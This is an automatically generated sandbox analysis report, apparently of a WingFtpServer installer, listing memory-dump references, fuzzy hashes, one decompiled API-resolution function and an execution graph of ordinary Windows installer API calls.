                                                                                                                                                                                                  • Associated: 00000012.00000002.564378271.0000000003BD8000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000012.00000002.564420194.0000000003BDB000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000012.00000002.564445349.0000000003BDC000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000012.00000002.564462184.0000000003BDD000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000012.00000002.564485538.0000000003BDF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_18_2_3aa0000_WingFtpServer.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: CharUpper
                                                                                                                                                                                                  • String ID: A$Z
                                                                                                                                                                                                  • API String ID: 9403516-4098844585
                                                                                                                                                                                                  • Opcode ID: 0d18b3f72b60120146716ce7ea8d3a2c507f782a33ecf074f05505660ead0c4b
                                                                                                                                                                                                  • Instruction ID: 288b23cbbc727bbf75c2021dc5a6d300c87b5810455a3cf6a371295dc3ac1167
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 0d18b3f72b60120146716ce7ea8d3a2c507f782a33ecf074f05505660ead0c4b
                                                                                                                                                                                                  • Instruction Fuzzy Hash: B9115612711A941BE734E17E5C807FB918FEB86260F4D063FE945CB380D9498C0143E1
                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                  Function 03AC91CC Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 16COMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                                                                                  			E03AC91CC() {
				void* __ebx;
				struct HINSTANCE__* _t1;
				void* _t4;

				_t1 = GetModuleHandleW(L"kernel32.dll");
				_t3 = _t1;
				if(_t1 != 0) {
					_t1 = E03AB222C(_t3, _t4, _t3, L"GetDiskFreeSpaceExW");
					 *0x3bcee3c = _t1;
				}
				if( *0x3bcee3c == 0) {
					 *0x3bcee3c = E03AC1A8C;
					return E03AC1A8C;
				}
				return _t1;
			}






                                                                                                                                                                                                  0x03ac91d2
                                                                                                                                                                                                  0x03ac91d7
                                                                                                                                                                                                  0x03ac91db
                                                                                                                                                                                                  0x03ac91e3
                                                                                                                                                                                                  0x03ac91e8
                                                                                                                                                                                                  0x03ac91e8
                                                                                                                                                                                                  0x03ac91f4
                                                                                                                                                                                                  0x03ac91fb
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x03ac91fb
                                                                                                                                                                                                  0x03ac9201

                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • GetModuleHandleW.KERNEL32(kernel32.dll,?,03AC92A8,00000000,03AC92C0,?,?,03AC925D), ref: 03AC91D2
                                                                                                                                                                                                    • Part of subcall function 03AB222C: GetProcAddress.KERNEL32(?,?), ref: 03AB2256
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000012.00000002.560034828.0000000003AA1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 03AA0000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000012.00000002.560012432.0000000003AA0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000012.00000002.564276492.0000000003BCE000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000012.00000002.564291693.0000000003BCF000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000012.00000002.564306803.0000000003BD0000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000012.00000002.564378271.0000000003BD8000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000012.00000002.564420194.0000000003BDB000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000012.00000002.564445349.0000000003BDC000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000012.00000002.564462184.0000000003BDD000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000012.00000002.564485538.0000000003BDF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_18_2_3aa0000_WingFtpServer.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: AddressHandleModuleProc
                                                                                                                                                                                                  • String ID: GetDiskFreeSpaceExW$kernel32.dll
                                                                                                                                                                                                  • API String ID: 1646373207-1127948838
                                                                                                                                                                                                  • Opcode ID: 9f1ad71384adc38fdc803818d324f40738a398f171c7ee38c2b3f7679b02edd7
                                                                                                                                                                                                  • Instruction ID: 0958cb08111776521b7446b77a8452ac9bbd19cc665cab89742137f2218ae69f
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 9f1ad71384adc38fdc803818d324f40738a398f171c7ee38c2b3f7679b02edd7
                                                                                                                                                                                                  • Instruction Fuzzy Hash: C8D09E746B038EEEE794EBE565C5B5675989709356F04542FD0508B606E7A0C4008F24
                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                  Execution Graph

                                                                                                                                                                                                  Execution Coverage:17.5%
                                                                                                                                                                                                  Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                                  Signature Coverage:9.8%
                                                                                                                                                                                                  Total number of Nodes:1362
                                                                                                                                                                                                  Total number of Limit Nodes:22
                                                                                                                                                                                                  execution_graph 3188 401941 3189 401943 3188->3189 3194 402c41 3189->3194 3195 402c4d 3194->3195 3236 40640a 3195->3236 3198 401948 3200 405afa 3198->3200 3278 405dc5 3200->3278 3203 405b22 DeleteFileW 3233 401951 3203->3233 3204 405b39 3206 405c59 3204->3206 3292 4063e8 lstrcpynW 3204->3292 3206->3233 3321 40672b FindFirstFileW 3206->3321 3207 405b5f 3208 405b72 3207->3208 3209 405b65 lstrcatW 3207->3209 3293 405d09 lstrlenW 3208->3293 3210 405b78 3209->3210 3213 405b88 lstrcatW 3210->3213 3215 405b93 lstrlenW FindFirstFileW 3210->3215 3213->3215 3215->3206 3225 405bb5 3215->3225 3218 405c3c FindNextFileW 3221 405c52 FindClose 3218->3221 3218->3225 3219 405ab2 5 API calls 3222 405c94 3219->3222 3221->3206 3223 405c98 3222->3223 3224 405cae 3222->3224 3228 405450 24 API calls 3223->3228 3223->3233 3227 405450 24 API calls 3224->3227 3225->3218 3229 405afa 60 API calls 3225->3229 3231 405450 24 API calls 3225->3231 3297 4063e8 lstrcpynW 3225->3297 3298 405ab2 3225->3298 3306 405450 3225->3306 3317 4061ae MoveFileExW 3225->3317 3227->3233 3230 405ca5 3228->3230 3229->3225 3232 4061ae 36 API calls 3230->3232 3231->3218 3232->3233 3244 406417 3236->3244 3237 406662 3238 402c6e 3237->3238 3269 4063e8 lstrcpynW 3237->3269 3238->3198 3253 40667c 3238->3253 3240 406630 lstrlenW 3240->3244 3241 40640a 10 API calls 3241->3240 3244->3237 3244->3240 3244->3241 3245 406545 GetSystemDirectoryW 3244->3245 3247 406558 GetWindowsDirectoryW 3244->3247 3248 40667c 5 API calls 3244->3248 3249 40640a 10 API calls 3244->3249 3250 4065d3 lstrcatW 3244->3250 3251 40658c SHGetSpecialFolderLocation 3244->3251 3262 4062b6 3244->3262 3267 40632f wsprintfW 3244->3267 3268 4063e8 lstrcpynW 3244->3268 3245->3244 3247->3244 3248->3244 3249->3244 3250->3244 3251->3244 3252 4065a4 SHGetPathFromIDListW CoTaskMemFree 3251->3252 3252->3244 3254 406689 3253->3254 3256 4066f2 CharNextW 3254->3256 3259 4066ff 3254->3259 3260 4066de CharNextW 3254->3260 3261 4066ed CharNextW 3254->3261 3274 405cea 3254->3274 3255 406704 CharPrevW 3255->3259 3256->3254 3256->3259 3257 406725 3257->3198 3259->3255 3259->3257 3260->3254 3261->3256 3270 406255 3262->3270 3265 4062ea RegQueryValueExW RegCloseKey 3266 40631a 3265->3266 3266->3244 3267->3244 3268->3244 3269->3238 3271 406264 3270->3271 3272 406268 3271->3272 3273 40626d RegOpenKeyExW 3271->3273 3272->3265 3272->3266 3273->3272 3275 405cf0 3274->3275 3276 405d06 3275->3276 3277 405cf7 CharNextW 3275->3277 3276->3254 3277->3275 3327 4063e8 lstrcpynW 3278->3327 3280 405dd6 3328 405d68 CharNextW CharNextW 3280->3328 3283 405b1a 3283->3203 3283->3204 3284 40667c 5 API calls 3290 405dec 3284->3290 3285 405e1d lstrlenW 3286 405e28 3285->3286 3285->3290 3288 405cbd 3 API calls 3286->3288 3287 40672b 2 API calls 3287->3290 3289 405e2d GetFileAttributesW 3288->3289 3289->3283 3290->3283 3290->3285 3290->3287 3291 405d09 2 API calls 3290->3291 3291->3285 3292->3207 3294 405d17 3293->3294 3295 405d29 3294->3295 3296 405d1d CharPrevW 3294->3296 3295->3210 3296->3294 3296->3295 3297->3225 3334 405eb9 GetFileAttributesW 3298->3334 3301 405adf 3301->3225 3302 405ad5 DeleteFileW 3304 405adb 3302->3304 3303 405acd RemoveDirectoryW 3303->3304 3304->3301 3305 405aeb SetFileAttributesW 3304->3305 3305->3301 3307 40546b 3306->3307 3316 40550d 3306->3316 3308 405487 lstrlenW 3307->3308 3309 40640a 17 API calls 3307->3309 3310 4054b0 3308->3310 3311 405495 lstrlenW 3308->3311 3309->3308 3313 4054c3 3310->3313 3314 4054b6 SetWindowTextW 3310->3314 3312 4054a7 lstrcatW 3311->3312 3311->3316 3312->3310 3315 4054c9 SendMessageW SendMessageW SendMessageW 3313->3315 3313->3316 3314->3313 3315->3316 3316->3225 3318 4061cf 3317->3318 3319 4061c2 3317->3319 3318->3225 3337 406034 3319->3337 3322 406741 FindClose 3321->3322 3323 405c7e 3321->3323 3322->3323 3323->3233 3324 405cbd lstrlenW CharPrevW 3323->3324 3325 405c88 3324->3325 3326 405cd9 lstrcatW 3324->3326 3325->3219 3326->3325 3327->3280 3329 405d85 3328->3329 3333 405d97 3328->3333 3330 405d92 CharNextW 3329->3330 3329->3333 3331 405dbb 3330->3331 3331->3283 3331->3284 3332 405cea CharNextW 3332->3333 3333->3331 3333->3332 3335 405abe 3334->3335 3336 405ecb SetFileAttributesW 3334->3336 3335->3301 3335->3302 3335->3303 3336->3335 3338 406064 3337->3338 3339 40608a GetShortPathNameW 3337->3339 3364 405ede GetFileAttributesW CreateFileW 3338->3364 3341 4061a9 3339->3341 3342 40609f 3339->3342 3341->3318 3342->3341 3344 4060a7 wsprintfA 3342->3344 3343 40606e CloseHandle GetShortPathNameW 3343->3341 3345 406082 3343->3345 3346 40640a 17 API calls 3344->3346 3345->3339 3345->3341 3347 4060cf 3346->3347 3365 405ede GetFileAttributesW CreateFileW 3347->3365 3349 4060dc 3349->3341 3350 4060eb GetFileSize GlobalAlloc 3349->3350 3351 4061a2 CloseHandle 3350->3351 3352 40610d 3350->3352 3351->3341 3366 405f61 ReadFile 3352->3366 3357 406140 3359 405e43 4 API calls 3357->3359 3358 40612c lstrcpyA 3360 40614e 3358->3360 3359->3360 3361 406185 SetFilePointer 3360->3361 3373 405f90 WriteFile 3361->3373 3364->3343 3365->3349 3367 405f7f 3366->3367 3367->3351 3368 405e43 lstrlenA 3367->3368 3369 405e84 lstrlenA 3368->3369 3370 405e8c 3369->3370 3371 405e5d lstrcmpiA 3369->3371 3370->3357 3370->3358 3371->3370 3372 405e7b CharNextA 3371->3372 3372->3369 3374 405fae GlobalFree 3373->3374 3374->3351 3375 4015c1 3376 402c41 17 API calls 3375->3376 3377 4015c8 3376->3377 3378 405d68 4 API calls 3377->3378 3388 4015d1 3378->3388 3379 401631 3381 401663 3379->3381 3382 401636 3379->3382 3380 405cea CharNextW 3380->3388 3384 401423 24 API calls 3381->3384 3402 401423 3382->3402 3392 40165b 3384->3392 3388->3379 3388->3380 3391 401617 GetFileAttributesW 3388->3391 3394 4059b9 3388->3394 3397 40591f CreateDirectoryW 3388->3397 3406 40599c CreateDirectoryW 3388->3406 3390 40164a SetCurrentDirectoryW 3390->3392 3391->3388 3409 4067c2 GetModuleHandleA 3394->3409 3398 405970 GetLastError 3397->3398 3399 40596c 3397->3399 3398->3399 3400 40597f SetFileSecurityW 3398->3400 3399->3388 3400->3399 3401 405995 GetLastError 3400->3401 3401->3399 3403 405450 24 API calls 3402->3403 3404 401431 3403->3404 3405 4063e8 lstrcpynW 3404->3405 3405->3390 3407 4059b0 GetLastError 3406->3407 3408 4059ac 3406->3408 3407->3408 3408->3388 3410 4067e8 GetProcAddress 3409->3410 3411 4067de 3409->3411 3413 4059c0 3410->3413 3415 406752 GetSystemDirectoryW 3411->3415 3413->3388 3414 4067e4 3414->3410 3414->3413 3416 406774 wsprintfW LoadLibraryExW 3415->3416 3416->3414 3883 4053c4 3884 4053d4 3883->3884 3885 4053e8 3883->3885 3886 405431 3884->3886 3887 4053da 3884->3887 3888 4053f0 IsWindowVisible 3885->3888 3894 405407 3885->3894 3889 405436 CallWindowProcW 3886->3889 3890 4043ab SendMessageW 3887->3890 3888->3886 3891 4053fd 3888->3891 3892 4053e4 3889->3892 3890->3892 3896 404d1a SendMessageW 3891->3896 3894->3889 3901 404d9a 3894->3901 3897 404d79 SendMessageW 3896->3897 3898 404d3d GetMessagePos ScreenToClient SendMessageW 3896->3898 3899 404d71 3897->3899 3898->3899 3900 404d76 3898->3900 3899->3894 3900->3897 3910 4063e8 lstrcpynW 3901->3910 3903 404dad 3911 40632f wsprintfW 3903->3911 3905 404db7 3906 40140b 2 API calls 3905->3906 3907 404dc0 3906->3907 3912 4063e8 lstrcpynW 3907->3912 3909 404dc7 3909->3886 3910->3903 3911->3905 3912->3909 3913 401e49 3914 402c1f 17 API calls 3913->3914 3915 401e4f 3914->3915 3916 402c1f 17 API calls 3915->3916 3917 401e5b 3916->3917 3918 401e72 EnableWindow 3917->3918 3919 401e67 ShowWindow 3917->3919 3920 402ac5 3918->3920 3919->3920 3921 40264a 3922 402c1f 17 API calls 3921->3922 3929 402659 3922->3929 3923 4026a3 ReadFile 3923->3929 3933 402796 3923->3933 3924 405f61 ReadFile 3924->3929 3925 4026e3 MultiByteToWideChar 3925->3929 3926 402798 3934 40632f wsprintfW 3926->3934 3927 405fbf 5 API calls 3927->3929 3929->3923 3929->3924 3929->3925 3929->3926 3929->3927 3930 402709 SetFilePointer MultiByteToWideChar 3929->3930 3931 4027a9 3929->3931 3929->3933 3930->3929 3932 4027ca SetFilePointer 3931->3932 3931->3933 3932->3933 3934->3933 3938 404dcc GetDlgItem GetDlgItem 3939 404e1e 7 API calls 3938->3939 3948 405037 3938->3948 3940 404ec1 DeleteObject 3939->3940 3941 404eb4 SendMessageW 3939->3941 3942 404eca 3940->3942 3941->3940 3943 404f01 3942->3943 3947 40640a 17 API calls 3942->3947 3989 40435f 3943->3989 3944 40511b 3946 4051c7 3944->3946 3955 405174 SendMessageW 3944->3955 3981 40502a 3944->3981 3950 4051d1 SendMessageW 3946->3950 3951 4051d9 3946->3951 3952 404ee3 SendMessageW SendMessageW 3947->3952 3948->3944 3953 404d1a 5 API calls 3948->3953 3972 4050a8 3948->3972 3949 404f15 3954 40435f 18 API calls 3949->3954 3950->3951 3958 4051f2 3951->3958 3959 4051eb ImageList_Destroy 3951->3959 3975 405202 3951->3975 3952->3942 3953->3972 3974 404f23 3954->3974 3960 405189 SendMessageW 3955->3960 3955->3981 3957 40510d SendMessageW 3957->3944 3962 4051fb GlobalFree 3958->3962 3958->3975 3959->3958 3964 40519c 3960->3964 3962->3975 3963 404ff8 GetWindowLongW SetWindowLongW 3966 405011 3963->3966 3976 4051ad SendMessageW 3964->3976 3965 405371 3967 405383 ShowWindow GetDlgItem ShowWindow 3965->3967 3965->3981 3968 405017 ShowWindow 3966->3968 3969 40502f 3966->3969 3967->3981 3992 404394 SendMessageW 3968->3992 3993 404394 SendMessageW 3969->3993 3972->3944 3972->3957 3973 404f73 SendMessageW 3973->3974 3974->3963 3974->3973 3977 404ff2 3974->3977 3978 404fc0 SendMessageW 3974->3978 3979 404faf SendMessageW 3974->3979 3975->3965 3980 404d9a 4 API calls 3975->3980 3985 40523d 3975->3985 3976->3946 3977->3963 3977->3966 3978->3974 3979->3974 3980->3985 3997 4043c6 3981->3997 3982 405347 InvalidateRect 3982->3965 3983 40535d 3982->3983 3994 404cd5 3983->3994 3984 40526b SendMessageW 3988 405281 3984->3988 3985->3984 3985->3988 3987 4052f5 SendMessageW SendMessageW 3987->3988 3988->3982 3988->3987 3990 40640a 17 API calls 3989->3990 3991 40436a SetDlgItemTextW 3990->3991 3991->3949 3992->3981 3993->3948 4011 404c0c 3994->4011 3996 404cea 3996->3965 3998 404489 3997->3998 3999 4043de GetWindowLongW 3997->3999 3999->3998 4000 4043f3 3999->4000 4000->3998 4001 404420 GetSysColor 4000->4001 4002 404423 4000->4002 4001->4002 4003 404433 SetBkMode 4002->4003 4004 404429 SetTextColor 4002->4004 4005 404451 4003->4005 4006 40444b GetSysColor 4003->4006 4004->4003 4007 404458 SetBkColor 4005->4007 4008 404462 4005->4008 4006->4005 4007->4008 4008->3998 4009 404475 DeleteObject 4008->4009 4010 40447c CreateBrushIndirect 4008->4010 4009->4010 4010->3998 4012 404c25 4011->4012 4013 40640a 17 API calls 4012->4013 4014 404c89 4013->4014 4015 40640a 17 API calls 4014->4015 4016 404c94 4015->4016 4017 40640a 17 API calls 4016->4017 4018 404caa lstrlenW wsprintfW SetDlgItemTextW 4017->4018 4018->3996 4019 4016cc 4020 402c41 17 API calls 4019->4020 4021 4016d2 GetFullPathNameW 4020->4021 4022 4016ec 4021->4022 4028 40170e 4021->4028 4024 40672b 2 API calls 4022->4024 4022->4028 4023 401723 GetShortPathNameW 4025 402ac5 4023->4025 4026 4016fe 4024->4026 4026->4028 4029 4063e8 lstrcpynW 4026->4029 4028->4023 4028->4025 4029->4028 4030 40234e 4031 402c41 17 API calls 4030->4031 4032 40235d 4031->4032 4033 402c41 17 API calls 4032->4033 4034 402366 4033->4034 4035 402c41 17 API calls 4034->4035 4036 402370 GetPrivateProfileStringW 4035->4036 4037 4044cf lstrlenW 4038 4044f0 WideCharToMultiByte 4037->4038 4039 4044ee 4037->4039 4039->4038 4040 404850 4041 40487c 4040->4041 4042 40488d 4040->4042 4101 405a32 GetDlgItemTextW 4041->4101 4044 404899 GetDlgItem 4042->4044 4050 4048f8 4042->4050 4046 4048ad 4044->4046 4045 404887 4048 40667c 5 API calls 4045->4048 4049 4048c1 SetWindowTextW 4046->4049 4053 405d68 4 API calls 4046->4053 4047 4049dc 4099 404b8b 4047->4099 4103 405a32 GetDlgItemTextW 4047->4103 4048->4042 4054 40435f 18 API calls 4049->4054 4050->4047 4055 40640a 17 API calls 4050->4055 4050->4099 4052 4043c6 8 API calls 4057 404b9f 4052->4057 4058 4048b7 4053->4058 4059 4048dd 4054->4059 4060 40496c SHBrowseForFolderW 4055->4060 4056 404a0c 4061 405dc5 18 API calls 4056->4061 4058->4049 4067 405cbd 3 API calls 4058->4067 4062 40435f 18 API calls 4059->4062 4060->4047 4063 404984 CoTaskMemFree 4060->4063 4064 404a12 4061->4064 4065 4048eb 4062->4065 4066 405cbd 3 API calls 4063->4066 4104 4063e8 lstrcpynW 4064->4104 4102 404394 SendMessageW 4065->4102 4069 404991 4066->4069 4067->4049 4072 4049c8 SetDlgItemTextW 4069->4072 4076 40640a 17 API calls 4069->4076 4071 4048f1 4074 4067c2 5 API calls 4071->4074 4072->4047 4073 404a29 4075 4067c2 5 API calls 4073->4075 4074->4050 4077 404a30 4075->4077 4078 4049b0 lstrcmpiW 4076->4078 4079 404a71 4077->4079 4087 405d09 2 API calls 4077->4087 4089 404ac9 4077->4089 4078->4072 4081 4049c1 lstrcatW 4078->4081 4105 4063e8 lstrcpynW 4079->4105 4081->4072 4082 404a78 4083 405d68 4 API calls 4082->4083 4084 404a7e GetDiskFreeSpaceW 4083->4084 4086 404aa2 MulDiv 4084->4086 4084->4089 4086->4089 4087->4077 4088 404b3a 4091 404b5d 4088->4091 4093 40140b 2 API calls 4088->4093 4089->4088 4090 404cd5 20 API calls 4089->4090 4092 404b27 4090->4092 4106 404381 EnableWindow 4091->4106 4095 404b3c SetDlgItemTextW 4092->4095 4096 404b2c 4092->4096 4093->4091 4095->4088 4098 404c0c 20 API calls 4096->4098 4097 404b79 4097->4099 4107 4047a9 4097->4107 4098->4088 4099->4052 4101->4045 4102->4071 4103->4056 4104->4073 4105->4082 4106->4097 4108 4047b7 4107->4108 4109 4047bc SendMessageW 4107->4109 4108->4109 4109->4099 4110 401b53 4111 402c41 17 API calls 4110->4111 4112 401b5a 4111->4112 4113 402c1f 17 API calls 4112->4113 4114 401b63 wsprintfW 4113->4114 4115 402ac5 4114->4115 4116 401956 4117 402c41 17 API calls 4116->4117 4118 40195d lstrlenW 4117->4118 4119 402592 4118->4119 3775 4014d7 3780 402c1f 3775->3780 3777 4014dd Sleep 3779 402ac5 3777->3779 3781 40640a 17 API calls 3780->3781 3782 402c34 3781->3782 3782->3777 4127 401f58 4128 402c41 17 API calls 4127->4128 4129 401f5f 4128->4129 4130 40672b 2 API calls 4129->4130 4131 401f65 4130->4131 4133 401f76 4131->4133 4134 40632f wsprintfW 4131->4134 4134->4133 4135 402259 4136 402c41 17 API calls 4135->4136 4137 40225f 4136->4137 4138 402c41 17 API calls 4137->4138 4139 402268 4138->4139 4140 402c41 17 API calls 4139->4140 4141 402271 4140->4141 4142 40672b 2 API calls 4141->4142 4143 40227a 4142->4143 4144 40228b lstrlenW lstrlenW 4143->4144 4145 40227e 4143->4145 4147 405450 24 API calls 4144->4147 4146 405450 24 API calls 4145->4146 4149 402286 4145->4149 4146->4149 4148 4022c9 SHFileOperationW 4147->4148 4148->4145 4148->4149 3836 40175c 3837 402c41 17 API calls 3836->3837 3838 401763 3837->3838 3839 405f0d 2 API calls 3838->3839 3840 40176a 3839->3840 3841 405f0d 2 API calls 3840->3841 3841->3840 4150 401d5d GetDlgItem GetClientRect 4151 402c41 17 API calls 4150->4151 4152 401d8f LoadImageW SendMessageW 4151->4152 4153 401dad DeleteObject 4152->4153 4154 402ac5 4152->4154 4153->4154 4155 4022dd 4156 4022e4 4155->4156 4157 4022f7 4155->4157 4158 40640a 17 API calls 4156->4158 4159 4022f1 4158->4159 4160 405a4e MessageBoxIndirectW 4159->4160 4160->4157 4161 401563 4162 402a6b 4161->4162 4165 40632f wsprintfW 4162->4165 4164 402a70 4165->4164 4166 4023e4 4167 402c41 17 API calls 4166->4167 4168 4023f6 4167->4168 4169 402c41 17 API calls 4168->4169 4170 402400 4169->4170 4183 402cd1 4170->4183 4173 402ac5 4174 402438 4175 402444 4174->4175 4177 402c1f 17 API calls 4174->4177 4178 402463 RegSetValueExW 4175->4178 4180 4031d6 44 API calls 4175->4180 4176 402c41 17 API calls 4179 40242e lstrlenW 4176->4179 4177->4175 4181 402479 RegCloseKey 4178->4181 4179->4174 4180->4178 4181->4173 4184 402cec 4183->4184 4187 406283 4184->4187 4188 406292 4187->4188 4189 402410 4188->4189 4190 40629d RegCreateKeyExW 4188->4190 4189->4173 4189->4174 4189->4176 4190->4189 3743 4039e6 3744 403a01 3743->3744 3745 4039f7 FindCloseChangeNotification 3743->3745 3746 403a15 3744->3746 3747 403a0b CloseHandle 3744->3747 3745->3744 3752 403a43 3746->3752 3747->3746 3750 405afa 67 API calls 3751 403a26 3750->3751 3753 403a51 3752->3753 3754 403a1a 3753->3754 3755 403a56 FreeLibrary GlobalFree 3753->3755 3754->3750 3755->3754 3755->3755 4198 401968 4199 402c1f 17 API calls 4198->4199 4200 40196f 4199->4200 4201 402c1f 17 API calls 4200->4201 4202 40197c 4201->4202 4203 402c41 17 API calls 4202->4203 4204 401993 lstrlenW 4203->4204 4206 4019a4 4204->4206 4205 4019e5 4206->4205 4210 4063e8 lstrcpynW 4206->4210 4208 4019d5 4208->4205 4209 4019da lstrlenW 4208->4209 4209->4205 4210->4208 4211 402868 4212 402c41 17 API calls 4211->4212 4213 40286f FindFirstFileW 4212->4213 4214 402897 4213->4214 4217 402882 4213->4217 4219 40632f wsprintfW 4214->4219 4216 4028a0 4220 4063e8 lstrcpynW 4216->4220 4219->4216 4220->4217 4221 40166a 4222 402c41 17 API calls 4221->4222 4223 401670 4222->4223 4224 40672b 2 API calls 4223->4224 4225 401676 4224->4225 3842 40176f 3843 402c41 17 API calls 3842->3843 3844 401776 3843->3844 3845 401796 3844->3845 3846 40179e 3844->3846 3881 4063e8 lstrcpynW 3845->3881 3882 4063e8 lstrcpynW 3846->3882 3849 40179c 3853 40667c 5 API calls 3849->3853 3850 4017a9 3851 405cbd 3 API calls 3850->3851 3852 4017af lstrcatW 3851->3852 3852->3849 3870 4017bb 3853->3870 3854 40672b 2 API calls 3854->3870 3855 405eb9 2 API calls 3855->3870 3857 4017cd CompareFileTime 3857->3870 3858 40188d 3860 405450 24 API calls 3858->3860 3859 401864 3861 405450 24 API calls 3859->3861 3869 401879 3859->3869 3862 401897 3860->3862 3861->3869 3863 4031d6 44 API calls 3862->3863 3864 4018aa 3863->3864 3865 4018be SetFileTime 3864->3865 3866 4018d0 FindCloseChangeNotification 3864->3866 3865->3866 3868 4018e1 3866->3868 3866->3869 3867 40640a 17 API calls 3867->3870 3871 4018e6 3868->3871 3872 4018f9 3868->3872 3870->3854 3870->3855 3870->3857 3870->3858 3870->3859 3870->3867 3873 4063e8 lstrcpynW 3870->3873 3876 405a4e MessageBoxIndirectW 3870->3876 3880 405ede GetFileAttributesW CreateFileW 3870->3880 3874 40640a 17 API calls 3871->3874 3875 40640a 17 API calls 3872->3875 3873->3870 3877 4018ee lstrcatW 3874->3877 3878 401901 3875->3878 3876->3870 3877->3878 3879 405a4e MessageBoxIndirectW 3878->3879 3879->3869 3880->3870 3881->3849 3882->3850 4226 4027ef 4227 4027f6 4226->4227 4230 402a70 4226->4230 4228 402c1f 17 API calls 4227->4228 4229 4027fd 4228->4229 4231 40280c SetFilePointer 4229->4231 4231->4230 4232 40281c 4231->4232 4234 40632f wsprintfW 4232->4234 4234->4230 4235 401a72 4236 402c1f 17 API calls 4235->4236 4237 401a7b 4236->4237 4238 402c1f 17 API calls 4237->4238 4239 401a20 4238->4239 4240 406af2 4241 406976 4240->4241 4242 4072e1 4241->4242 4243 406a00 GlobalAlloc 4241->4243 4244 4069f7 GlobalFree 4241->4244 4245 406a77 GlobalAlloc 4241->4245 4246 406a6e GlobalFree 4241->4246 4243->4241 4243->4242 4244->4243 4245->4241 4245->4242 4246->4245 4247 401573 4248 401583 ShowWindow 4247->4248 4249 40158c 4247->4249 4248->4249 4250 402ac5 4249->4250 4251 40159a ShowWindow 4249->4251 4251->4250 4252 402df3 4253 402e05 SetTimer 4252->4253 4254 402e1e 4252->4254 4253->4254 4255 402e6c 4254->4255 4256 402e72 MulDiv 4254->4256 4257 402e2c wsprintfW SetWindowTextW SetDlgItemTextW 4256->4257 4257->4255 4259 401cf3 4260 402c1f 17 API calls 4259->4260 4261 401cf9 IsWindow 4260->4261 4262 401a20 4261->4262 4263 4014f5 SetForegroundWindow 4264 402ac5 4263->4264 4265 402576 4266 402c41 17 API calls 4265->4266 4267 40257d 4266->4267 4270 405ede GetFileAttributesW CreateFileW 4267->4270 4269 402589 4270->4269 3783 401b77 3784 401b84 3783->3784 3785 401bc8 3783->3785 3788 4022e4 3784->3788 3794 401b9b 3784->3794 3786 401bf2 GlobalAlloc 3785->3786 3787 401bcd 3785->3787 3789 40640a 17 API calls 3786->3789 3791 401c0d 3787->3791 3802 4063e8 lstrcpynW 3787->3802 3790 40640a 17 API calls 3788->3790 3789->3791 3793 4022f1 3790->3793 3798 405a4e MessageBoxIndirectW 3793->3798 3803 4063e8 lstrcpynW 3794->3803 3795 401bdf GlobalFree 3795->3791 3797 401baa 3804 4063e8 lstrcpynW 3797->3804 3798->3791 3800 401bb9 3805 4063e8 lstrcpynW 3800->3805 3802->3795 3803->3797 3804->3800 3805->3791 4271 4024f8 4281 402c81 4271->4281 4274 402c1f 17 API calls 4275 40250b 4274->4275 4276 402533 RegEnumValueW 4275->4276 4277 402527 RegEnumKeyW 4275->4277 4279 40288b 4275->4279 4278 402548 RegCloseKey 4276->4278 4277->4278 4278->4279 4282 402c41 17 API calls 4281->4282 4283 402c98 4282->4283 4284 406255 RegOpenKeyExW 4283->4284 4285 402502 4284->4285 4285->4274 4286 40167b 4287 402c41 17 API calls 4286->4287 4288 401682 4287->4288 4289 402c41 17 API calls 4288->4289 4290 40168b 4289->4290 4291 402c41 17 API calls 4290->4291 4292 401694 MoveFileW 4291->4292 4293 4016a0 4292->4293 4294 4016a7 4292->4294 4296 401423 24 API calls 4293->4296 4295 40672b 2 API calls 4294->4295 4298 402250 4294->4298 4297 4016b6 4295->4297 4296->4298 4297->4298 4299 4061ae 36 API calls 4297->4299 4299->4293 4307 401e7d 4308 402c41 17 API calls 4307->4308 4309 401e83 4308->4309 4310 402c41 17 API calls 4309->4310 4311 401e8c 4310->4311 4312 402c41 17 API calls 4311->4312 4313 401e95 4312->4313 4314 402c41 17 API calls 4313->4314 4315 401e9e 4314->4315 4316 401423 24 API calls 4315->4316 4317 401ea5 4316->4317 4324 405a14 ShellExecuteExW 4317->4324 4319 401ee7 4320 406873 5 API calls 4319->4320 4322 40288b 4319->4322 4321 401f01 FindCloseChangeNotification 4320->4321 